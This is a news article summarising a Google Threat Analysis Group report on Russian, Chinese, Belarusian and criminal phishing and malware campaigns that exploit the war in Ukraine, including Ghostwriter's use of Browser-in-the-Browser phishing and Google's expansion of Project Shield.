NATO Countries Targeted in Russian Phishing Attacks, Google Reports
Threat Actors Lure Targets to Open Malicious Emails or Click on Malicious Links.
According to the Google Threat Analysis Group (TAG), a great number of threat actors are currently exploiting the event of the Russian invasion in Ukraine to launch phishing and malware cyberattacks against Eastern European and NATO countries. The cyberattacks also target Ukraine.
As Google’s report reads:
Government-backed actors from China, Iran, North Korea, and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links. (…) Financially motivated and criminal actors are also using current events as a means for targeting users. For example, one actor is impersonating military personnel to extort money for rescuing relatives in Ukraine. TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.
Credential phishing cyberattacks organized by a Russian-based hacking group known as COLDRIVER against a NATO Center of Excellence and Eastern European forces are highlighted in the paper.
A Ukrainian defense contractor and many US-based non-governmental organizations (NGOs) together with think tanks were also among the targets of Russian threat actors.
Curious Gorge, a hacking group linked to China’s PLA SSF (People’s Liberation Army Strategic Support Force), targeted government and military institutions in Ukraine, Russia, Kazakhstan, and Mongolia, according to Google security researchers.
Ghostwriter, a threat actor reportedly backed by Belarus, was seen employing a new phishing tactic called Browser in the Browser (BitB) phishing, which was publicly exposed in mid-March and has since been used by other government-sponsored APTs.
Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites. The new technique (..) draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site. Once a user provides credentials in the dialog, they are posted to an attacker controlled domain.
As the same report further explains, credential phishing attempts by Belarusian state hackers have previously targeted Ukrainian government and military personnel as well as European refugee aid officials.
Financially motivated and criminal actors are also using current events as a means for targeting users. For example, one actor is impersonating military personnel to extort money for rescuing relatives in Ukraine. (…) TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.
What Other Cyberattacks Have Targeted Ukraine and Other Countries?
The BleepingComputer publication underlines that Google’s recent report follows another one Google TAG published in early March about harmful activity linked to Russia’s conflict in Ukraine, which revealed Russian, Chinese, and Belarus state hackers’ attempts to breach Ukrainian and European organizations and politicians.
Gmail users linked with the US government were also targeted in phishing attempts organized by the Chinese-backed APT31 hacking organization, Google confirmed in March.
This wave of attacks has also included distributed denial-of-service (DDoS) operations against the Ukrainian government and state-owned banks, as well as a variety of malware campaigns, as the same publication mentions.
What Measures Has Google Implemented?
Project Shield, Google’s free DDoS prevention service, has been expanded to help the Ukrainian government, embassies throughout the world, and other governments keep their websites up and running.